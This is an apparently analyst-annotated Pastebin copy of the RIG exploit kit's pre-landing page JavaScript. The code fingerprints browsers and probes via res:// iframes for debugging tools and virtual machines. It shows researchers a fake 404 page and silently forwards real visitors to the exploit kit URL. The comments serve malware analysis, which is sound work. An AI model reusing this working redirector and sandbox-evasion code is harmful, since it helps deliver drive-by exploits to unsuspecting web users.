API tools faq
paste
Advertisement
MalwareBreakdown

Commented JavaScript from RIG's pre-landing page

MalwareBreakdown
Mar 7th, 2017
10,791
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 17.08 KB | None | 0 0
raw download clone embed print report
  1. <!DOCTYPE html>
  2. <html lang="en">
  3. <head>
  4. <title></title>
  5. <meta charset="UTF-8">
  6. <meta http-equiv="X-UA-Compatible" content="IE=EDGE">
  7. <meta name="apple-mobile-web-app-capable" content="yes">
  8. <meta name="apple-mobile-web-app-status-bar-style" content="black">
  9. <meta name="viewport" content="width=device-width, initial-scale=1.0">
  10. </head>
  11. <body>
  12. <iframe onload="window.setTimeout('go()', 99)" src="about:blank" style="visibility:hidden"></iframe>
  13. <script>
  14. var NormalURL = 'http://try[.]WERREW[.]INFO/?oq=m3Wp_YrLbNVNVDhiECBclBhnYlZW1NHovv9h0jUzR6fhMHQ-UHbUTp1u9CQUbI&q=wXjQMvXcJwDQCobGMvrESLtNNknQA0KK2Iv2_dqyEoH9cmnihNzUSkrx6B2aC';
  15. var InfoStr = '';
  16. var appPaths,foundObjects,appsCount,framesLoaded,foundAppsCounter,iFrameObject;
  17. var iFrameName = 'myFrame';
  18. var debug = false;
  19. var isChecked = 0;
  20.  
  21. // doubly-declared? but initialized by calling the genPaths() function
  22. var appPaths = genPaths();
  23.  
  24.  
  25. function getBrowser() {
  26. var ua = navigator.userAgent;
  27.  
  28. var browsrObj = {
  29. browser: 'unknown',
  30. browser_real: '',
  31. is_bot: false,
  32. browser_quality: 0,
  33. platform: 'desktop',
  34. versionFull: '',
  35. versionShort: ''
  36. };
  37.  
  38. try{
  39.  
  40. var bName = function () {
  41. if (ua.search(/Edge/) > -1) return "edge";
  42. if ((ua.search(/MSIE/) > -1) || (ua.search(/Trident/) > -1)) return "ie";
  43. if (ua.search(/Firefox/) > -1) return "firefox";
  44. if ((ua.search(/Opera/) > -1) || (ua.search(/OPR/) > -1)) return "opera";
  45. if (ua.search(/YaBrowser/) > -1) return "yabrowser";
  46. if (ua.search(/Chrome/) > -1) return "chrome";
  47. if (ua.search(/Safari/) > -1) return "safari";
  48. if (ua.search(/Maxthon/) > -1) return "maxthon";
  49. else return "unknown";
  50. }();
  51.  
  52. browsrObj.browser = bName;
  53.  
  54. if(/iphone|ipad|ipod|android|blackberry|mini|windows\sce|palm/i.test(navigator.userAgent.toLowerCase())) browsrObj.platform = 'mobile';
  55.  
  56. var version;
  57. if(bName != 'unknown')
  58. {
  59. switch (bName) {
  60. case "edge":
  61. version = (ua.split("Edge")[1]).split("/")[1];
  62. break;
  63. case "ie":
  64. if((ua.search(/Trident/) > -1))
  65. {
  66. version = (ua.split("; rv:")[1]).split(")")[0];
  67. }
  68. else
  69. {
  70. version = (ua.split("MSIE ")[1]).split(";")[0];
  71. }
  72. break;
  73. case "firefox":
  74. version = ua.split("Firefox/")[1];
  75. break;
  76. case "opera":
  77. version = ua.split("Version/")[1];
  78. break;
  79. case "operaWebkit":
  80. bName = "opera";
  81. version = ua.split("OPR/")[1];
  82. break;
  83. case "yabrowser":
  84. version = (ua.split("YaBrowser/")[1]).split(" ")[0];
  85. break;
  86. case "chrome":
  87. version = (ua.split("Chrome/")[1]).split(" ")[0];
  88. break;
  89. case "safari":
  90. version = (ua.split("Version/")[1]).split(" ")[0];
  91. break;
  92. case "maxthon":
  93. version = ua.split("Maxthon/")[1];
  94. break;
  95.  
  96. }
  97.  
  98. browsrObj.versionFull = version;
  99. browsrObj.versionShort = version.split(".")[0];
  100. }
  101.  
  102. } catch (err) {}
  103.  
  104.  
  105. var w=window,d=document;
  106. var CorrectBrowser = true;
  107. var uaBrowser = browsrObj;
  108. var isIE = isChrome = isFirefox = isOpera = 0;
  109.  
  110. if(uaBrowser.platform != 'mobile' && (browsrObj.browser == 'ie' || browsrObj.browser == 'chrome' || browsrObj.browser == 'firefox'))
  111. {
  112. if('ActiveXObject' in window) isIE++;
  113. if('chrome' in window) isChrome++;
  114. if('opera' in window) isOpera++;
  115.  
  116. if('getBoxObjectFor' in d || 'mozInnerScreenX' in w) isFirefox++;
  117.  
  118. if('WebKitCSSMatrix' in w||'WebKitPoint' in w||'webkitStorageInfo' in w||'webkitURL' in w) isChrome++;
  119.  
  120.  
  121. var f=0;
  122. f|='sandbox' in d.createElement('iframe')?1:0;
  123. f|='WebSocket' in w?2:0;
  124. f|=w.Worker?4:0;
  125. f|=w.applicationCache?8:0;
  126. f|=w.history && history.pushState?16:0;
  127. f|=d.documentElement.webkitRequestFullScreen?32:0;
  128. f|='FileReader' in w?64:0;
  129.  
  130.  
  131. if(f==0) isIE++;
  132.  
  133. if(isIE > 0)
  134. {
  135. browsrObj.browser_real = 'ie';
  136. browsrObj.browser_quality = isIE;
  137. }
  138. if(isChrome > 1 && isFirefox == 0)
  139. {
  140. browsrObj.browser_real = 'chrome';
  141. browsrObj.browser_quality = isChrome;
  142. }
  143. if(isFirefox > 0 && isChrome == 0)
  144. {
  145. browsrObj.browser_real = 'firefox';
  146. browsrObj.browser_quality = isFirefox;
  147. }
  148.  
  149. if(uaBrowser.browser != uaBrowser.browser_real) browsrObj.is_bot = true;
  150. }
  151.  
  152. InfoStr += browsrObj.browser+'-'+browsrObj.browser_real+'_ie'+isIE+'chrome'+isChrome+'firefox'+isFirefox;
  153.  
  154. return browsrObj;
  155. }
  156.  
  157. //////////////////////////////////////////////// THIS LOOKS LIKE WHERE THE NEW_PRE-FILTER_CHECKS STARTS ////////////////////////////////////////////////
  158. // Tests for debugging, and the logs the value passed into deb(c).
  159. function deb(o) {
  160. if (!debug) return false;
  161. console.log(o);
  162. }
  163.  
  164. // This function is called from within the createiFrame(), objectStateCheck(), countFrameLoaded(), and go() functions.
  165. // The return value is the version number, otherwise, -1.
  166. function getInternetExplorerVersion() {
  167. // Declare and assign the variable 'rv' to the value -1.
  168. var rv = -1;
  169.  
  170. // Parse out the verison of the Internet Explorer browser.
  171. if (navigator.appName == 'Microsoft Internet Explorer') {
  172. var ua = navigator.userAgent;
  173. // Checks for versions prior to IE11.
  174. var re = new RegExp("MSIE ([0-9]{1,}[\.0-9]{0,})");
  175. // Executes for a search in a string ('ua') for the regex object ('re').
  176. if (re.exec(ua) != null)
  177. // As long as the return value was not null, then parse out the version.
  178. rv = parseFloat( RegExp.$1 );
  179. } else if (navigator.appName == 'Netscape') {
  180. // Same operations done for the Netscape derivative.
  181. var ua = navigator.userAgent;
  182. var re = new RegExp("Trident/.*rv:([0-9]{1,}[\.0-9]{0,})");
  183. if (re.exec(ua) != null)
  184. rv = parseFloat( RegExp.$1 );
  185. }
  186. return rv;
  187. }
  188.  
  189. // This function is called from the go() function.
  190. function createiFrame(c){
  191. // Initialize and assign the iframe on the page.
  192. var d=document.createElement('iframe');
  193. // Set the 'id' attribute to 'myFrame' plus the current for-loop index. For example, 'myFrame0', 'myFrame1', etc.
  194. d.setAttribute('id',iFrameName+c);
  195. // Set the 'name' attribute of the iframe to the same value of the 'id' field. For example, 'myFrame0', 'myFrame1', etc.
  196. d.setAttribute('name',iFrameName+c);
  197. // Set the height and width of the iframe to a single pixel.
  198. d.style['width']='1px'
  199. d.style['height']='1px';
  200.  
  201. // The function delclaration for zrs() exists to call the function "objectCheckState(c)".
  202. function zrs(){objectCheckState(c);}
  203.  
  204. // The function declaration for zlo() exists to call the function "countFrameLoaded(c)".
  205. function zlo(){countFrameLoaded(c);}
  206.  
  207. // If the victim's browser is IE11, then perform the following setAttribute methods.
  208. if (getInternetExplorerVersion()==11) {
  209. // Specifies what function to be called when the readyState property changes.
  210. d.setAttribute('onReadyStateChange',"objectCheckState('"+c+"')");
  211. // This event occurs when an object has been loaded.
  212. d.setAttribute('onLoad',"countFrameLoaded('"+c+"')");
  213. } else {
  214. // If the browser version is not IE11, then do the following.
  215. // Use eventListeners to perform the same functions above done with the setAttribute methods.
  216. if(d['addEventListener']){
  217. // Add the listener and then call the zrs() function when the readyState property changes.
  218. // This performs a objectCheckState(c) function called through the zrs() function call.
  219. d['addEventListener']('readystatechange',zrs,false);
  220. // Add the listener and then call the zlo() function when the document has been loaded.
  221. // This performs a countFrameLoaded(c) function called through the zlo() function call.
  222. d['addEventListener']('load',zlo,false);
  223. } else {
  224. // If the 'addEventListener' means didn't work, then try the same iframe state changes with 'attachEvent'.
  225. if(d['attachEvent']){
  226. d['attachEvent']('on'+'readystatechange',zrs);
  227. d['attachEvent']('on'+'load',zlo);
  228. }
  229. }
  230. }
  231.  
  232. // Set the source attribute to the 'res' key's value and then add the child to the document.
  233. d.setAttribute('src',appPaths[c]['res']);
  234. document.body.appendChild(d);
  235. }
  236.  
  237. function objectCheckState(c){
  238. // For IE11 browsers.
  239. if (getInternetExplorerVersion()==11) {
  240. // For when the 'stateIterate' value is zero, this state indicates the readyState is request not initialized.
  241. if (!appPaths[c]['stateIterate'])
  242. // Then, set the readyState of the iframe to server connection established.
  243. appPaths[c]['stateIterate']=1;
  244. // Otherwise, then increment the readyState of the iframe from whatever the current state of it is.
  245. // This would occur when more than a single call is made on the iframe.
  246. else appPaths[c]['stateIterate']++;
  247. }
  248.  
  249. // This is done for none IE11 browsers; however, this will be done twice by the IE11 browsers.
  250. // Define and assign the readyState of the iframe and perform the same behavior above.
  251. var rs = document.getElementById(iFrameName+c).readyState;
  252. if (!appPaths[c][rs])
  253. appPaths[c][rs]=1;
  254. else appPaths[c][rs]++;
  255. }
  256.  
  257. // This function is called from within the createiFrame(c) function
  258. function countFrameLoaded(c){
  259. // Find the appPaths name of the current for-loop interation index.
  260. var _cfl_appName=appPaths[c]['name'];
  261. // Find the appPaths type of the current for-loop interation index.
  262. var _cfl_appType=appPaths[c]['type'];
  263.  
  264. // Here test if: interactive > 1 OR (stateIterate == 1 AND IE11)
  265. if(appPaths[c]['interactive']>1 || (appPaths[c]['stateIterate']==1 && getInternetExplorerVersion()==11)){
  266. // Push that application name onto the foundObjects stack.
  267. foundObjects.push(_cfl_appName);
  268. } else {
  269. };
  270.  
  271. // Increment the current counter of how many frames have been loaded.
  272. framesLoaded++;
  273.  
  274. // If the number of iframes counted equals the number of applications loaded for checking, then call the finishChecking() function.
  275. if (framesLoaded==appsCount) {
  276. finishChecking();
  277. }
  278. }
  279.  
  280. // This function is called from within the countFrameLoaded(c) function, and accepts no input.
  281. function finishChecking() {
  282. // BrowserInfo contains the browserObj returned from getBrowser().
  283. BrowserInfo = getBrowser();
  284. // This variable is initialized as 0 at the beginning of the document.
  285. isChecked++;
  286.  
  287. // This checks for objects found such as: AV, VMs, etc.
  288. // The operations done on the foundObjects iteration was commented out.
  289. if (foundObjects.length>0) {
  290. dopStr = 'VM';
  291. for (i in foundObjects) {
  292. //dopStr = dopStr+'_'+foundObjects[i];
  293. }
  294. // This is just going to contain "VMVMVMVMVM" for however many found objects there are.
  295. InfoStr =InfoStr+dopStr;
  296. }
  297.  
  298. // If the browser is a bot or there are several objects found. Print the same string that would be printed for when isChecked is zero.
  299. if(BrowserInfo.is_bot == true || foundObjects.length>0) {
  300. document.write('<html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.2.22 (Debian) Server Port 80</address><iframe src="/log.php?info='+InfoStr+'" width=10 height=10></iframe></body></html>');
  301. } else {
  302. // If this is not a bot, then post the document back as normal (the EK request).
  303. window.frames[0].document.body.innerHTML = '<form target="_parent" method="post" action="'+NormalURL+'"></form>'; window.frames[0].document.forms[0].submit();
  304. }
  305.  
  306. // Then call the deleteiFrame('myFrame#') function.
  307. var b=0;
  308. for(b=0;b<appsCount;b++){
  309. deleteiFrame('myFrame'+b);
  310. }
  311. }
  312.  
  313. // This function is called from within the finishChecking() function.
  314. function deleteiFrame(c) {
  315. // Find the iframe and then remove the child.
  316. var d=document.getElementById(c);
  317. d.parentNode.removeChild(d);
  318. }
  319.  
  320. // This function is first called at the beginning of the html page to assign the value to the "appPaths" variable.
  321. function genPaths() {
  322.  
  323. // below are three declared and assigned variables for static strings on the machine
  324. // in this case, the System32, Program Files, and Program Files (x86) paths
  325. var path_sys32 = '\\Windows\\System32\\drivers\\',
  326. path_pf = 'C:\\Program Files\\',
  327. path_pfx86 = 'C:\\Program Files (x86)\\';
  328.  
  329. // The variable "appPath" is an array of dictionaries that contains key-value pairs for tools, AV, and VMs.
  330. // It appears these are dictionary structures that contain the path location to cross-reference the victim machine for these items.
  331. // NOTE, the AV signatures have been commented out currently for some reason.
  332. var appPath = [
  333. {name:'Fiddler2',resident:'/#24/1',res:'Fiddler2\\Fiddler.exe',type:'tool',filetype:'pf'},
  334. {name:'Fiddler2',resident:'/#24/1',res:'Fiddler2\\uninst.exe',type:'tool',filetype:'pf'},
  335. {name:'FFDec',resident:'/#24/1',res:'FFDec\\Uninstall.exe',type:'tool',filetype:'pf'},
  336.  
  337. /* the two path signatures were commented out for some reason
  338. {name:'NOD32',resident:'/#24/1',res:'ESET\\ESET NOD32 Antivirus\\egui.exe',type:'av',filetype:'pf'},
  339. {name:'Bitdefender',resident:'/#24/1',res:'Bitdefender Agent\\ProductAgentService.exe',type:'av',filetype:'pf'},
  340. */
  341.  
  342. {name:'VirtualBox',resident:'/#24/#1',res:'Oracle\\VirtualBox Guest Additions\\uninst.exe', type:'vm',filetype:'pf'},
  343. {name:'VMware',resident:'/#16/#1',res:'VMware\\VMware Tools\\TPAutoConnSvc.exe',type:'vm',filetype:'pf'},
  344. {name:'VMware',resident:'/#24/2',res:'VMware\\VMware Tools\\VMToolsHook.dll',type:'vm',filetype:'pf'}
  345. ];
  346.  
  347. // Initializes the variable "appPathsCompilled" to an empty array.
  348. var appPathsCompilled = [];
  349.  
  350. for(var i=0;i<appPath.length;i++) {
  351. // Currently, no dictionary keys for filetype that has been assigned the value of 'driver', thus this is not executed.
  352. if (appPath[i]['filetype']=='driver') {
  353. appPathsCompilled.push({name:appPath[i]['name'],res:'res://' + path_sys32 + appPath[i]['res'] + '.sys' + appPath[i]['resident'], resident:appPath[i]['resident'], type:appPath[i]['type'],filetype:appPath[i]['filetype']});
  354. }
  355.  
  356. // All the files in the appPath dictionary array have a filetype of 'pf'.
  357. // Then the files are constructed into a dictionary and pushed onto the array (stack), with the paths for both Program Files and x86
  358. if (appPath[i]['filetype']=='pf') {
  359. appPathsCompilled.push({name:appPath[i]['name'],res:'res://' + path_pfx86 + appPath[i]['res'] + appPath[i]['resident'], resident:appPath[i]['resident'], type:appPath[i]['type'],filetype:appPath[i]['filetype']});
  360. appPathsCompilled.push({name:appPath[i]['name'],res:'res://' + path_pf + appPath[i]['res'] + appPath[i]['resident'], resident:appPath[i]['resident'], type:appPath[i]['type'],filetype:appPath[i]['filetype']});
  361. }
  362. }
  363.  
  364. return appPathsCompilled;
  365. }
  366.  
  367. // This function is called by the iframe at the top of the html page and that same iframe specifies a timeout of 99ms
  368. function go() {
  369. // Initialize the foundObjects variable declared at the beginning of the html page
  370. foundObjects=[];
  371.  
  372. // With an appPath.length of seven and then doubled by adding a Program Files and Program Files (x86) versions, then this should be fourteen
  373. appsCount=appPaths.length;
  374.  
  375. // Initialize the framesLoaded variable.
  376. framesLoaded=0;
  377.  
  378. // Initialize the iFrameObject variable to an empty array.
  379. iFrameObject={};
  380.  
  381.  
  382. for(var c=0;c<appsCount;c++) {
  383. // Check to ensure the given array index of appPaths[] is not 'undefined', otherwise, the error should be logged to the browser's console.log.
  384. if (typeof appPaths[c] == 'undefined') deb('IS UNDEFINED '+c);
  385. // If not 'undefined', then create the iframe by calling the createiFrame(c) function.
  386. // The value passed into the createiFrame(c) function is the current index of the for-loop.
  387. createiFrame(c);
  388. }
  389.  
  390. // If the finishChecking() function is never run, then the value of isChecked does not changed and, consequently, will remain as 0 (or boolean false)
  391. if(isChecked == false) {
  392. BrowserInfo = getBrowser();
  393. // Check the is_bot field, if it's true; then write the information below. This is the 404 Not Found and specifying the contacted version of server.
  394. // The iframe is the domain "/log.php?info=" + InfoStr + "NOchecked".
  395. if(BrowserInfo.is_bot == true) {
  396. document.write('<html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.2.22 (Debian) Server Port 80</address><iframe src="/log.php?info='+InfoStr+'NOchecked" width=10 height=10></iframe></body></html>');
  397. }
  398. // If the is_bot field is false, then print the information below. This is the 404 Not Found and specifying the contacted version of server.
  399. // The iframe contains more information "/log.php?info=" + InfoStr + "NOcheckedNOBOT" + browserVersion.
  400. else {
  401. window.frames[0].document.body.innerHTML = '<form target="_parent" method="post" action="'+NormalURL+'"></form>'; window.frames[0].document.forms[0].submit();
  402. //document.write('<html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.2.22 (Debian) Server Port 80</address><iframe src="log.php?info='+InfoStr+'NOcheckedNOBOT'+getInternetExplorerVersion()+'" width=10 height=10></iframe></body></html>');
  403. }
  404. }
  405. }
  406.  
  407. </script>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!